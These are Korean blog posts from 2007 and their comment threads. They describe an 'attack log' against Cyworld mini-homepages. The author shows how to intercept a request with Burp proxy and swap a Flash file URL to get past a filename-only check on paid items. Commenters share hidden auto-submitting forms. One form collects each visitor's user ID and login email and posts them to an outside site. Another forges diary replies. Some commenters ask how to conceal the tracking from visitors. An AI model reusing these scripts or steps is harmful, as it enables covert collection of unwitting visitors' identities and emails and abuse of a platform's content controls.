위 소스를 제 홈페이지 visiter 폴더안에 index.php로 저장후

<FORM name=guest action=http://제홈페이지.co.kr/visiter/ method=post target=ifrm_symbol>
<INPUT type=hidden value=wonny name=user_name>
<INPUT type=hidden name=guest_name>
<INPUT type=hidden name=email>
<INPUT type=hidden name=datetime>
</FORM>
<IMG alt=blank src="http://제홈페이지/cymain.jpg" onload="window.parent.nameUI_init();document.getElementById('guest_name').value=window.parent.myuser_id;document.getElementById('email').value=window.parent.c2.nameUI.strLoginEmail;document.getElementById('datetime').value=new Date();document.getElementById('guest').submit();">

이렇게 폼을 형성후 입력후에도

제 홈페이지/visiter/wonny 페이지를 찾을수 없다고 나옵니다.

퍼미션은 777로 준 상태구요.

뭐가 문제일까요?
]

부탁드릴게요 ^^

Commented by 오우 at 2007-03-03 20:17 # x





샤니// 사진첩에서 음.. 파로스로 해보는데 어렵군요..ㅠ
파일올리기를 수정하면 되는 건가요??ㅋㅋ

Commented at 2007-03-03 21:34 # x





비공개 덧글입니다.


Commented by at 2007-03-03 23:26 # x





다이어리나 게시판같은곳에 스크립트 올려지나요?


Commented by ... at 2007-03-03 23:50 # x





피코피코님// 혹시 님 계정에 이상?이 있는건 아닐까요??
php를 지원하지 않는건 아닐테죠?? 아님 혹시 프로필 안 누르신건...^^;;;
틀린건 없는 것 같은데요,, 저도 그대로 했거든요.
잘은 모르지만,,,
프로필 추적 해보려고 oranc하고 dothome 가입했습니다.^^;;;;
둘다 무료 계정이고, php지원 하는데요, 첨에 오란씨에서 실행 결과 tid(?)하고 이메일은 나오는데 시간이 안 나오더군요... 한참 씨름하다가 다른데(dothome) 가입하고 똑같이 했더니 잘 되더라고요,,,
이유는 잘 모르겠네요. 완초보..ㅋ
님도 한번 다른 계정에 올려보세요,, 안 된다면,,, 잘 모르겠습니다^^;;

Commented by 오우 at 2007-03-04 00:15 # x





tid 값을 받으려면 guest_name으로 해야하나용?


Commented by 또늦었네.. at 2007-03-04 00:51 # x





파로스.... 어렵네요....
연구 무지 하고 있는데....
어떻게 해야할지 진도가 안나가네요... ㅡㅡ;;
도와주세요....

Commented by 샤니 at 2007-03-04 01:37 # x






db에 저장하는 법 말구 쉽게 하는 방법으로 네이버블로그를 이용하는 방법이 있습니다.
네이버 블로그에 자동댓글을 남기는 형식이고요..자동댓글이 남겨질때 이름에 tid넣고요 홈페이지에 싸이주소+tid해서 자동댓글이 남겨지게 하면 뭐..바로 클릭해서 방문자싸이도 들어갈수 있고요 시간도 나오고..
할수 있네용...한때 사용했던 방법입니다..이건 외부에 노출된다는 단점이 있지요..ㅎㅎㅎㅎ

Commented by 우연히 at 2007-03-04 02:37 # x





글 잘 보고 갑니다.

<FORM name=guest action=http://제홈페이지.co.kr/visiter/ method=post target=ifrm_symbol>
에서 post방식일경우 action의 url은 문서까지 포함되어야되는 것으로 알고 있습니다.
action=http://제홈페이지.co.kr/visiter/index.php 로

Commented by 어뜨케... at 2007-03-04 17:18 # x





샤니// 님아...파로스이용해서 사진첩에서 태그 쓰는법좀 갈쳐주세용
파로스 다운받아서 해볼라구 해찌만...도무지....어렵네여
동영상 게시판이용해서 댓글남는건 되는데...
플래쉬는 죽어도 못올리게써욤...
5일동안 이짓하구 있네염...ㅡ.,ㅡ;;

젠장..'

도와줌세용!!

Commented by 덜덜덜 at 2007-03-04 18:28 # x





파로스..사용법은 간단하지만 -_-
시밤 사이에서 쳐 막아버리네염 ㅜㅜㅜㅜ
사진첩에 플래쉬 올리기..
대략 쥐쥐쳤으셈 ㅜㅜ
방법좀 공유 ~~야호 ~!해주세요 ㅜㅜ

Commented by youandme at 2007-03-05 16:39 # x





전에 다이어리에 답글 달리게 하던 소스인데요..
이걸 동영상 게시판에 달리게 하려면 어떻게 소스를 바꿔야할지좀 알려주세요..

<html>
<head>

<script>
function timeVal() {
var time = new Date()
var yy = time.getYear()
var mm = time.getMonth() + 1
var dd = time.getDate()
var hour = time.getHours()
var minute = time.getMinutes()
var second = time.getSeconds()
var pos_val = " "

pos_val += yy + " 년" + mm + "월 " + dd + "일" + " " + ((hour > 12) ? (hour - 12) : hour)
pos_val += ((minute < 10) ? ":0" : ":") + minute
pos_val += ((second < 10) ? ":0" : ":") + second
pos_val += (hour >= 12) ? " PM" : " AM"
return pos_val;
}
</script>
</head>

<body onload="javascript:document.reply_frm0.content.value=timeVal();document.reply_frm0.submit()">
<form name="reply_frm0" method="post" action="http://minihp.cyworld.nate.com/pims/diary5/mydiary/diary5_replyok.asp">
<input type="hidden" name="list_type" value="2">
<input type="hidden" name="toyearmonday" value="XXXXXXXX">
<input type="hidden" name="item_seq" value="XXXXXXXXX">
<input type="hidden" name="folder_no" value="0">
<input type="hidden" name="review_seq" value="">
<input type="hidden" name="open_item_seq" value="">
<input type="hidden" name="seq_type" value="0">
<input type="hidden" name="reply" value="">
<input type="hidden" name="tid" value="XXXXXXXX">
<input type="text" name="content" style="width:200px;"class="input2" value="">
</form>

</body>
</html>

Commented by 지나가는 연세인 at 2007-03-05 21:01 # x





글 잘보고 갑니다..
정말 대단하다는 말밖에는 할말이 없군요..
그런데 제가 컴퓨터는 거의 잼병이라 아무리 해도 잘 안되네요..
도와주세요~ 언제 연고-고연전에 밥이라도? ^^;
정말 필요해서요..부탁드릴께요..

Commented by devil at 2007-03-06 16:13 # x





싸이메인에 플래시올린사람 어떻게확인하죠 ?
메인사진있는곳에서 오른쪽눌러서
확대 재생 이런거뜨면 플래시로 돼있는건가요?

Commented by ㅠㅠ at 2007-03-06 20:32 # x





저는 컴퓨터에 대해 아무것도 모르는데요,
이걸 봐도 뭘 어떻게하는건지 도무지 알수가없네요.
제게 쉽게 설명해 줄 수 있으신분 혹시 계신가요?
꼭좀 부탁드립니다. 저의 이메일은 lsatgirl@gmail.com 이예요
컴퓨터를 잘 아시는 여러분들 좋으시겠어요 ㅠㅠ

Commented by multipoet at 2007-03-06 20:53 # x





싸이월드로 오는 사람을 새로 이사한 블로그로 돌리려고 함니다.
플래쉬 올리는 거 성공하신분 제 블로그에 비밀글로 남겨 주시거나
힌트라도 주시면 감사하겠습니다
네이버 쪽지도 받습니다

Commented by 또늦었네.. at 2007-03-06 21:58 # x





싸이메인에 플래시 올리는 방법 쫌~~
같이 공유해주세요!! 부탁드려요 ^^;;

Commented by 오우 at 2007-03-06 22:46 # x





ㅋㅋ//님 저는 플래시는 만들었는데 올리지를 못하고 있네요..ㅠ
정보좀 공유해요 우리 ㅎㅎㅎ

Commented by Spatialguy at 2007-03-11 21:14 #





고려대학교 만세다!!


Commented by jin at 2007-03-11 21:41 # x





ㅠ.ㅠ
아~
지금 안되는건가요?
너무어려워요..........
좀..도와주실분.ㅠ.ㅠ?

Commented by 출사고고 at 2007-03-12 21:20 # x


 





다이어리에 쓰는 소스 대신,
프로필을 읽게 하면 될것 같은데
시도해보니 체크는 되는데 tid값이 같이 가질 않는군요(undefined로 나옴)
tid값을 catch해내거나 그냥 프로필을 읽게끔 하는 소스를 아시는분은 답변부탁드려요

?출처: http://iwonny.egloos.com/3021127

신고
  1. 태희 2007.11.03 10:14 신고

    무지 구시대적 방법이네요 ^^ 아직도 저런방법쓰는군요

    더 획기전인거 알려드릴까요??

    제 싸이는 누가 왔다가면 누가 왔다갔는지 아이피 주소랑 시간이랑 이름까지 문자로 오게 해놨습니다. 문자는 네이트온 무료문자에서 차감하도록 했구요. 이거 가능하니까 잘 생각해서 응용들 하세요

    네이트온 무료문자 차감되는 경우가 두가지 있습니다 하나는 역시 네이트온에서 보낼때 또라는 방법이 있는데 그건 정말 잘찾으셔야 될겁니다. ^^ㅎㅎ

워니. 추억ㅇㅔ ㅂㅣ추ㅇㅓ. iwonny.egloos.com valley log-in



싸이월드 공격 일지 2 - 스토리룸에 플래시를 올려보자


넵, 그럼 스토리룸에 플래쉬를 올려보겠습니다 -
http://www.cyworld.com/ssowonny

/*
플래쉬를 이용해서 방문자 추적을 하는 방법은 이미 알려져 있는 것으로 알고 있습니다;
시간이 되면 저도 해보고 포스팅 해 보겠습니다~
*/



원리
원리라고 하니까 역시 거창해 보이는군요! ㅋ
거창하지 않습니다.

이것 역시 미니미를 바꿔치기 할 수 있는 원리와 같습니다.
싸이월드 스토리룸에 있는 아이템들은 플래쉬로 구성이 되어 있더군요.
기본 플래쉬 위에 이것 저것 올려버리는 듯 합니다.

문제는 이 정보를 http://...../....swf 같이 주소로 보낸다는데 있지요.
어이쿠, 이 것은 미니미 때와 같은 실수군요.

그렇다면, 우리가 할 일은? 그렇습니다~ 저 주소를 바꿔치기 하면 되는거군요!

하지만 싸이월드는 나름대로 방어를 해 놓았습니다.
미니미와는 달리 유료 컨텐츠 이기 때문에, 싸이월드는 자신이 소지하지 않은 아이템은 올릴 수 없게 해 놓아야 했죠.
어떻게 해 놓았을까요?

네! 그렇습니다~
자신이 갖고있는 플래시 파일의 이름과 같은지 검사를 하는군요.
오호, 괜찮은 검사 방법일까요?
저런, 이거 어쩌죠? 저는 같은 이름 을 가진 전혀 다른 내용의 플래시 파일을 하나 갖고 있군요.

그렇습니다.
단순히 파일명 검사만 하기 때문에, 같은 이름을 가진 플래시라면 어떤 것이든 업로드 할 수 있습니다.

/* 아마도 많이들 파악 하셨을 테죠. 미니미때와 마찬가지 입니다. if 문 하나면 막을 수 있는 문제입니다. 간단히 말해서 이 포스팅이 된 후 몇분안에 이 방식이 막힌다 해도 별반 놀랄일이 아니라는거죠. */



방법
burp proxy 를 사용해 봅시다.
우선, 여기에서 아주 간단한 burp proxy 사용법에 대해서 숙지하고 돌아와주세요 ㅎㅎ


자, 이제 준비는 끝났습니다.
우선 burp proxy를 활성화 시키고,
intercept Off 상태로 만들어서 일단은 잡아채지 못하도록 해 놓읍시다.

이제 싸이월드 스토리룸 수정으로 가서
기본 아이템인 `무료 메모장'을 설치하고
스토리룸을 저장 해봅시다.




이런 화면이 뜨겠군요.
자, 이제 `확인'을 누르기전에!!!!

burp proxy 를 Intercept On 상태로 만듭니다.

자, 이제 확인을 누르고 burp proxy 를 살펴봅시다.
뭔가 알수 없는 내용들이 주르륵- 나오는데요,
밑에 칸에 swf 를 써 놓고 화면을 아래쪽으로 주르륵 내려봅시다.




보이십니까? 특수문자가 %와 숫자를 이용한 방식으로 표현되어 있긴 하지만,
http xxxxxxxxxxxxxx swf 가 뚜렷이 보이는군요!
자, 이제 모두 끝났습니다.
저 주소 대신 어딘가 존재하는 플래시 파일 주소를 집어 넣으시면 됩니다.
단!!!! 아까 주의를 드렸듯이 `파일명' 이 같아야 합니다.
무료 메모장 파일명은 MM_0.swf 이군요

수정 하셨나요? 그렇다면 이제 Intercept Off 로 만들고 Forward 를 클릭해봅시다.
띠링~ 하고 `스토리룸 저장에 성공하였습니다' 등의 메세지가 뜨면 성공!
메인페이지로 가서 확인해 봅시다.


* 아까 말씀드렸듯이, 싸이월드 입장에서는 금세 막을 수 있는 방법입니다. 언제 막힐지 알 수 없습니다.
* 방문자 추적은 시간이 되면 해보도록 하겠습니다 (벌써 점심시간도 다 끝났군요 ㅠ_ㅠ) ㅎㅎ, 못기다리시는 분들은 인터넷 어딘가에서 플래시를 이용해 방문자 추적하는 방법을 본 것 같으니 응용해보시기 바랍니다.

# by 워니 | 2007-02-22 14:25 | 컴이야기 | 트랙백 | 덧글(72)





트랙백 주소 : http://iwonny.egloos.com/tb/3012176
내 이글루에 이 글과 관련된 글 쓰기 (트랙백 보내기) [도움말]

Commented by 미소년☆리죵 at 2007-02-22 14:50 #




ㅎㅎ결과물이 궁금해서 싸이 들렸다가 왔어요 ㅎ

멋집니다~

Commented by 11 at 2007-02-22 15:06 # x




감사감사합니다 제발 싸이측에서 몰랐으면 하네요


Commented by youandme at 2007-02-22 16:26 # x




오오~ 감사합니다.. 기다린 보람이 있군요..
방문자 추적까지 하는 방법 좀 해보시고 되면
알려주세요 ^^;

Commented by Spatialguy at 2007-02-22 16:44 #




이 글을 쓴사람은 고려대학교 컴퓨터공학과 삼성원이라고 합니다.


Commented by 크리스티아누 at 2007-02-22 19:09 # x




burp proxy에서 intercept on 하고 스토리룸 저장 확인 누른 다음에 빨간색으로 밑줄 친 주소를 제가 다음 블로그에 올린 http://cfs7.blog.daum.net/upload_control/download.blog?fhandle=MEY2bUdAZnM3LmJsb2cuZGF1bS5uZXQ6L0lNQUdFLzAvMC5zd2Y=&filename=0.swf&filename=MM_0.swf 라는 주소로 ctrl + v 로 붙여넣기 한 후 intercept off를 누르고 forward를 눌렀더니 띠링~하고 소리가 나야 되는데 페이지를 찾을 수 없다고 나오는군요...
이건 어떤 경우죠;;;;ㅠㅠ참 이거 어렵네용;

Commented by 11 at 2007-02-22 19:23 # x




안그러시면 그냥 싸이 게시판에 올리시지요
전 싸이 게시판에 올려서 해보니깐 아무 문제 없이 잘 되던데요

Commented by 하앜 at 2007-02-22 20:59 # x




어딘가 존재하는 플래시파일이라면.... 왭사이트에 링크되있는 주소를 절루 옮기면 되는건가요??


Commented by 크리스티아누 at 2007-02-22 21:10 # x




음..윗 분 말씀대로 싸이 게시판에 올려서 했더니 정말 플래쉬 파일은 올려지네요ㅋ
그런데...플래쉬 파일 올리는 것 빼곤
옛날 방법대로 다 했는데뭔가 잘못되었는지 방문자 리플은 달리지 않네요...ㅠㅠㅠ
워니님께서 하실 때까지 기다려야겠어요...ㅠㅠㅠ

Commented by 크리스티아누 at 2007-02-22 21:41 # x




음 아마도 지금 네이버에서 떠도는 옛날 소스는 싸이에서 막아놓은 건 아닌지...


Commented by 궁금해 at 2007-02-22 21:57 # x




기록이 남겨지던 옛날소스 + 워니님의 방법으로 플래쉬삽입은 성공했으나? 방문자 기록은 안남네여 뭐가 잘못 된걸까여? ^^;


Commented by 크리스티아누 at 2007-02-22 22:00 # x




궁금해님 저도 마찬가지에요~아직 완벽하게 완성되진 않은 듯~!


Commented by -_-v at 2007-02-22 23:51 # x




오 오늘오니 2탄이 올려져있네요 ^^
매번 감사합니다.

음. 예전 플래시 방문자 소스는 사람들이 싸이 접속할때 자기 싸이 주소창에보면 고유번호처럼
기록을하려면 무슨 숫자같은걸 받아서 기록하게되는데 그걸 싸이에서 일정한 숫자가
나오지 않게 했다더군요(자세히는 모르고 어서 주워들은 이야기;)

Commented by 쿠니쿠니 at 2007-02-23 08:48 # x




축하드립니다 ^^ㅋ


Commented at 2007-02-23 08:50 #




비공개 덧글입니다.


Commented at 2007-02-23 09:07 #




비공개 덧글입니다.


Commented by 워니 at 2007-02-23 09:45 #




* 프로필에 쓰던 방법이 안되는 이유
스토리룸이 나오는 프레임은, iframe이 한개인가 두개 더 안쪽으로 들어갑니다.
이전에 쓰던 것은 window.parent. 을 이용해서 바로 위쪽의 소스를 가지고 오는데,
지금은 iframe이 몇개 더 들어가 있으니 안되는거죠 ㅎㅎ

* 기존 방법이 안되는 이유
네, -_-v 님께서 말씀해 주셨듯이 게시판 쪽에는 where_chk 라는 것을 둠으로써
아무렇게나 리플이 남는것을 막아놨는데요,
클럽 게시판쪽은 안막혀 있는 것으로 알고있고,
쿠니쿠니님 말로는 다이어리쪽도 안막혀 있다고 하는군요~

Spatialguy// ㅋㅋㅋㅋ
비밀// 포워딩 시켜 놓으셨군요, 좋은방법입니다-_-)b 축하드려요 ㅎㅎ
비밀// 음, 쿠니쿠니님께서 파로스가 더 편하다고 하셨네요, 한번 써보세요~ (저는 안써봐서 잘 모르겠네요 ㅎㅎ;; 아마 비슷하게 사용하면 될 듯 합니다)

와아와아...
갑작스레 여행을 가게 됬네요-_- 허허허;;
일요일쯤엔 시간이 되려나 모르겠네요 ㅠㅠ

Commented by 하앜 at 2007-02-23 11:59 # x




어딘가 존재하는 플래시파일이라면.... 왭사이트에 링크되있는 주소를 절루 옮기면 되는건가요??


Commented by 워니 at 2007-02-23 13:32 #




하앜// 넵, 그렇습니다~ 위에 리플로 올려주신분이 말하셨듯, 싸이월드에 올린뒤에 그 주소를 갖다 넣어도 되겠죠? ㅎㅎ


Commented at 2007-02-23 13:35 # x




비공개 덧글입니다.


Commented by 스닉 at 2007-02-23 15:30 # x




다이어리는 되는군요. 감사합니다. =)


Commented by youandme at 2007-02-23 16:17 # x




오우~! 윗분 대단하세요~
다이어리에 리플달리도록 소스를 손보는 일이 너무 어려워요 ㅠㅠ

좀 가르쳐 주실수 있으세요??

Commented by 아무개씨 at 2007-02-23 17:10 # x




html 파일은 그냥 다이어리에 그림삽입하는 그것으로 이용하면 되는건가요?

방문자 리플이 난 왜 안달리지..ㅜㅜ

Commented by 궁금해 at 2007-02-23 18:49 # x




자기 다이어리 소스는 어떻게 보나여? 오른쪽 마우스 안되던데? 저위에 프로그램을 이용해서 해봤는데 원하는 정보가 다 나오진 않던데? 제가 잘몰라서여? ^^


Commented by 뽀리 at 2007-02-23 20:02 # x




이런짓이나 하고있다니 너답다
신고해야지^-^
형 담주에 외박나간다 ㄱㄱ

Commented by 스닉 at 2007-02-23 21:22 # x




오른쪽 마우스 제한 풀기는 아이토이를 쓰시면 되요.
그 밖에 여러가지 좋은 기능이 많이 있죠 =)

Commented by asdfgzx at 2007-02-24 02:12 # x




아이토이 프로그램도 좋지만 제 같은 경우에는 웹마라는 플그램 사용합니다.
웹마진짜 강추 강추 강추 합니다.
저도 익스플러러 사용하다가 웹마 사용하는데 이제는 익스보다는 웹마가 더 편하고 간편하고
좋은거 같습니다. 소스보기 금지된싸이트도 소스보기 다 됩니다. 음악소스밑 동영상소스 주소 다 나옵니다.
전 귀찬니스트입니다. 진짜 귀찬니스트들한테 간편하게 사용하기 좋은 플그램이라고 생각합니다.
오른쪽 마우스 안 먹히는거 웹마에선 다 됩니다. 완전 식은죽 먹기죠 소스보기 물론 주소까지 쉽게 다 나옴
웹마 홍보가 아니라. 진짜 이거 하시는 님들한테 편한 플그램이라해서 적어봅니다.
저도 웹마로 쉽게 싸이 방문자 추적까지하고 쉽게 플래쉬까지 올렸습니다.(웹마기능중에플래쉬멈춤이있습니다 그기능이용하시면 geturl걸려서바로넘어가는플래쉬멈취서잡게할수도있습니다)
전 웹마라는 프로그램으로 인터넷서핑도편하고 하고 싸이방문자추적도 쉽게 완료해서 지금 잘 사용하고 있습니다. 진짜 많이 적은거 같다. ㅋㅋ 님들 다들 싸이 추적 성공하시기를 빌겠습니다. 아자 아자 화이또옹~~~

Commented at 2007-02-24 02:24 #




비공개 덧글입니다.


Commented by 소프트 at 2007-02-24 02:26 #




저도 웹마2깔긴했는데.. 으.. 처음부터 막히다니.. 짜증나라.. 허허


Commented at 2007-02-24 02:32 #




비공개 덧글입니다.


Commented at 2007-02-24 02:41 #




비공개 덧글입니다.


Commented at 2007-02-24 10:01 # x




비공개 덧글입니다.


Commented at 2007-02-24 21:09 #




비공개 덧글입니다.


Commented by lovely at 2007-02-24 21:13 # x





인터넷 정신은 공유라 생각됩니다
워니님 덕분에 새로운 웹지식을 알게 되어 고맙습니다
또한 싸이질은 잘 안하는 편이지만
방문자 추적(?)이라는 작은 호기심을 해소할 수 있었군요
홍홍~

메인에 플래쉬를 다는 방법으로 방명록 기록 시간도 바꿀 수가 있겠더군요
그런데 이런 일이 일상생활에 큰 영향을 미치지 못한다는 것을
자각해야겠군요

이곳에 모든분들께
즐웹되시길

Commented by -_-v at 2007-02-24 21:14 # x




워니님글과 다이어리 이용하는 소스를보고 이렇게 저렇게 해보다 성공했습니다.
감사하다는 글남기고 갑니다~ ^^

아! 질문이있는데 소스분석시 swf파일명이 MM_0인것은 어떻게 알수있나요?

Commented by 나그네 at 2007-02-24 22:15 # x






MM_0 인것은 스토리룸 업로드 창에서 소스를 분석하시면 알 수 있을 겁니다

Commented by 아흑~ㅠㅠ at 2007-02-24 22:45 # x




님들...죄송하지만,..방문자추적하는 법 처음부터 자세히 알려주심 안될까요?? 완전 컴맹이라서..ㅠㅠㅠ


Commented at 2007-02-25 01:20 # x




비공개 덧글입니다.


Commented by ㅠㅠ at 2007-02-25 04:52 # x




제가 컴퓨터를 완전 못하거든요ㅠㅠ 그래서 그러는데 다이어리??에하는
방문자추적그거좀 자세히 가르쳐주세요ㅠㅠ 처음부터 어떻게하는지좀요ㅠㅠ
부탁드려요~~

Commented by -_-v at 2007-02-25 12:21 # x




아니아니 나그네씨 말자난도아니고 -_-; 제질문을 오해한거같네요.
MM_0를 소스를본상태에서 어떻게 보는지 모른다는겁니다.
일반인이 보기에는 대놓고 MM_0라고 보이지 않고 swf%252FMM%255F0%252swf 라 보이지 않습니까;
다른 싸이 스토리룸 플래시파일을 적용시킨뒤 소스를보면 소스를 분석할줄 몰라서 했던질문이에요.

Commented by ㅡㅡ;; at 2007-02-25 13:14 # x




일반인이 보기에는 대놓고 MM_0이라고 보이는 나는 머지?? ;;;


Commented by LOCKid at 2007-02-25 16:23 #




인기인이야 인기인


Commented at 2007-02-25 16:33 # x




비공개 덧글입니다.


Commented by 만구백원 at 2007-02-25 16:35 # x




제 블로그는 여기입니다..
http://10900.tistory.com

Commented by 워니 at 2007-02-26 01:00 #




여행 잘 다녀왔습니다 - ㅎㅎ
사실 어제 돌아왔지만,
이제서야 컴퓨터를 제대로 잡아보게 됬네요-_-ㅋ

와아 - 많이들 남겨주셨네요 ㅎㅎ
오늘은 졸려서 일단 잘게요 ㅠ_ㅠ

뭐, 플래시가 된 이상 시간싸움이었으니 ㅋ
방문자 기록 좀전에 성공했습니다~
방법은 또, 역시나, 시간날때 (점심때쯤이나 ㅎㅎ) 포스팅 하겠습니다~

좋은 밤 되세요~ ''zzz''

Commented at 2007-02-26 05:25 #




비공개 덧글입니다.


Commented by 나그네 at 2007-02-26 10:26 # x




-_-v// 나그네씨는 말장난 안했는데요? 홍홍! 업로드창에서 소스보기 하면 다르게 나옵니다 [-_-v]<---님이 말씀하신 swf%252FMM%255F0%252swf 이건 프록시에서 보여지는 소스이지 않나요? 뭔가를 해보고 발끈하시징... 신경써서 대답을 해주어도 욕을 먹다니 어처구니가 없네요, 하하. 스샷찍어서 입어 넣어드려야 되는 겁니까? 너무 날로 드시려 하는 건 아닌지? 하하하하


Commented at 2007-02-26 10:51 #




비공개 덧글입니다.


Commented by asdf at 2007-02-26 13:45 # x




-_-v // 실력이 안 되면 그냥 하지 마세요. 어쩝니까 안되는걸..^^


Commented by -_-v at 2007-02-26 16:37 # x




나그네// 그렇군요. 업로드 창이란걸 스토리룸 설정창으로 잘못 이해하고 있었군요. 제가 성급했네요. 발끈은 안하고 생각한게 다른거같아 다시쓴건데 발근한걸로 오셨군요. 흥흥! 말씀대로 스샷이라도 찍어서 떠먹여주셨으면 좀더 빨리 이해했겠군요. 이글외에 있는질문을 해서 대답에 이해를 못하면 날로 먹는거군요. 하하하하

asdf님 아는게 힘이래요. 댁은 막히는부분있으면 하지마세요. 어쩝니까 안되는걸.. ^^

Commented by asdf at 2007-02-26 17:42 # x




-_-v // 죄송해서 어쩌죠? 저 이미 방문자 추적까지 설치 완료했는데...^^;


Commented by 크리스티아누 at 2007-02-26 18:33 # x




님들~!!
싸우지들 마세요^^;;;;
주인장님 속상하시겠네요;

저도 흠님이 올려주신 소스보고 머리 좀 굴려서
하다보니 성공했어요ㅋ예전 방법을 조금만 바꾸면 되네요ㅋ

저도 컴퓨터 언어 이런 건 전혀 모르는데 성공했어요~님들도 힘내세요~ㅋ
어쨌든 워니님께 감솨!!!!
자주자주 놀러 올께요~

Commented by 크리스티아누 at 2007-02-26 22:11 # x




오적암살단장님...
플래쉬가 로드된 후 하얀 화면만 남는 것 좀 해결하게 비법 좀 전수해 주십쇼ㅜ
정말 다 눈치 챌 것 같아요..차라리 예전 워니님 방법이 더 나을 수도..
부탁드려용ㅠㅠㅠ

Commented by 쿠니쿠니 at 2007-02-26 23:05 # x




크리스티아누//

힌트는..아이프레임.. ^^

Commented at 2007-02-26 23:19 # x




비공개 덧글입니다.


Commented by 크리스티아누 at 2007-02-27 07:36 # x




음..ㅠ
제가 컴맹이라서 좀 알아듣기 힘드네요ㅠㅠㅠㅠ
연구해볼께요ㅠㅠㅠ

Commented by fan at 2007-02-27 09:29 # x




이야.. 어제 이거 보고 새벽 3시까지 하고 오늘 아침에 20분 더 해서
드디어.. 해내써요..
음. 스토리룸은 그냥 100퍼 뜨면서 아무 변화 없구. 이거 눈치채거나
하진 못하겠는데. 이거 싸이에 걸릴까요?
플래쉬 파일도 없는데 싸이가 걸러낼수 있나..?ㅠ

Commented by fan at 2007-02-27 09:32 # x




근대 이상한게...
왜 제 아이디가 처음으로 떳는데 제가 지금 시간이 9시인데
2007 년2월 27일 2:07:09 AM 이라고 뜨는걸까요;;;;;;;;

Commented by 워니 at 2007-02-27 09:50 #




와아 - ㅎㅎ
초간단 기록 방법 http://iwonny.egloos.com/3021127 에 포스팅해 놓았습니다~

답변 다 못달아 드려서 죄송해요'_'
업무시간이 시작되어서 저는 샤샤샥...

Commented by 뽀나 at 2007-02-28 00:02 # x




와.. 5시간 끙끙대다가 해결 했네요
여기는 천재들만 모였나 봐요 ;;(반쯤죽다 살았음)
좋은 정보 감사합니다.
많이 배워 갑니다. ^ㅇ^

Commented by 크리스티아누 at 2007-02-28 10:16 # x




흠님 감솨~^^


Commented by 덜덜덜 at 2007-02-28 17:02 # x




저도 학교에 가면 컴터 좀 한다는 아이지만..

저도 겨우 아.. 대충 이해 되지만.. 막상 하려니까 완전 골때리네요. ㅠㅠ

Commented by 막혔네요 at 2007-02-28 20:06 # x




내부서버오류라며 수정이 되지 않습니다.


Commented by 동감 at 2007-03-01 19:12 # x




랜 자체연결이 안되서 그런 것같아요


Commented by 흐미 at 2007-03-02 05:50 # x




저는 왜 burp proxy 127.0.0.1하고 8080했는데 웹페이지가 안떠요 ㅜ_ㅡ
이거 뭐 글 다 이해해놓고 이거부터 안되니 죽겠네요-_-;

Commented by 궁금해요!! at 2007-03-02 19:42 # x




아~진짜미치게따
도와주세용!!!
http://cyimg17.cyworld.nate.com/common/file_down.asp?redirect=%2Fy52701%2F2007%2F3%2F2%2F31%2FMM%5F0%2Eswf
swf있는 주소이거든요 싸이 게시판에 올린 주세에요
그냥 이대로 변경하구 forward 누르니까 연결이 안되네요
어떻게 변경해서 올리는건지...제발 도와주세요

Commented by 최준환 at 2007-03-03 02:21 # x




저도 위에 분과 비슷하네요 forward 누르니깐 연결이 않돼네요 ㅠㅠㅠ
http://my.dreamwiz.com/ddjjjang/a0400x0300.swf
주소는 여기인데 ㅠㅠㅠ

Commented by 궁금 at 2007-03-09 02:29 # x




나도 위에분과 같은데 모야 막힌건가?


Commented by 나모 at 2007-03-13 03:34 # x




후아....플래시 파일을 못올리겠는데요....스크립트는 짜놓고 계속 삽퍼는 중 ㅠㅠ


Commented by 호동이형 at 2007-03-13 17:26 # x




막힌것같아요-_-암래도;;


Commented by 워니 at 2007-03-13 18:28 #




앗, 여기다가는 안적어 놨었군요 ;; 죄송합니다 -
이 방법으로 스토리룸에 플래쉬 올리는 것 막혔습니다

Commented at 2007-03-13 21:48 # x




비공개 덧글입니다.


Commented by 이휴 at 2007-03-15 00:30 # x




스토리룸에 플레쉬 올리는거 아직 가능합니다.

약간의 트릭만 첨가하면 사용가능하지요..

기존 주소를 그대로 두고 살짝 바꿔주면 사용가능합니다..

출처: http://iwonny.egloos.com/3012176

신고
  1. 란랑 2007.09.05 15:43 신고

    이거 막혔나요.. 이휴님 어찌올릴수있지요,,,?

  2. ㄴㄴㄴㄴ 2007.10.08 22:15 신고

    무료 메모장 파일명은 MM_0.swf 이군요

    수정 하셨나요?
    이부분 도저히 모르겟네요 ㅠㅠ
    고수님들아 부탁드립니다 제발 이부분좀 가르켜 주십시요 ㅠㅠ

  3. 징징징징 2007.10.31 19:43 신고

    음.. 설명대로 플래시 파일을 만들었는데요..
    싸이메인에 올리니깐 잠깐 메인이 뜨더니 화면이 하얗게 변해 버리더라구요;;-ㅇ-
    플래시를 재생할때 플래시 자체는 가만히 있고
    getURL걸린 소스만 실행시키는 방법이 없나요?
    아니면 getURL("x.html","_blank";)이거 쓴다음에 새로운 페이지에서
    x.html소스를 로딩할때 창크기를 0x0으로 조절할수없나요?

    resizeto(0,0)

    이렇게 하면은 주소창,메뉴바 이런게 떠서요...
    주소창,메뉴바,상태바,툴바 기타등등 감추는 스크립트가 뭐예요?
    location=0,status=0,toolbar=0이런걸 어떻게 적용시켜야 되죠?

    컴퓨터 초보인데 무작정 하려고 맘먹고 삼일밤새고 있어요..ㅠㅠㅠㅠㅠㅠ

    다른건 다 괜찮은데(플래시올리는거,댓글달리는거)
    화면 하얗게 되는것때문에 고생하고 있어요.
    제발 도와주세요..엉엉

  4. fhsk 2007.11.05 23:50 신고

    이거 막혔습니다 ㅡㅡ^;;;;;;;;

워니. 추억ㅇㅔ ㅂㅣ추ㅇㅓ. iwonny.egloos.com valley log-in



싸이월드 공격 일지


Update 2007-02-20 18:35
/* 쿠니쿠니님께 감사! */
플래쉬 업로드 성공하였습니다~ http://www.cyworld.com/ssowonny
싸이 참, 허허 관리를 그렇게 하는군요-_-
(저도 남말할 것은 못되지만 ㅎㅎ - 아래 소스 보셨나요? 지금 제 집에있는건 조금 보완을 했지만, 엄청나게 쉬운?공격 루트가 숨어져 있죠.)

음, 퇴근시간도 됬고, 가봐야해서 ㅠ_ㅠ
시간 날때 방법 업로드 하도록 하겠습니다 -
( 방문자 기록하도록 플래쉬도 만들어야 겠군요;; )


----

음, 사실 뭐 거창한 걸 기대하시는 분들께는 죄송하지만, 거창하지 않습니다.
두괄식으로 결론 부터 말씀드리자면, 죄송하지만 아직까지는 싸이월드 미니홈피 메인페이지에 스크립트를 넣는 것은 실패 했습니다.
다만, 미니미를 투명인간으로 만드는 것 정도만 성공했군요.
http://www.cyworld.com/ssowonny

자, 그럼 시작해 볼까요?
최대한 HTML만 알면 알아들을 수 있도록 얘기해 보겠습니다.

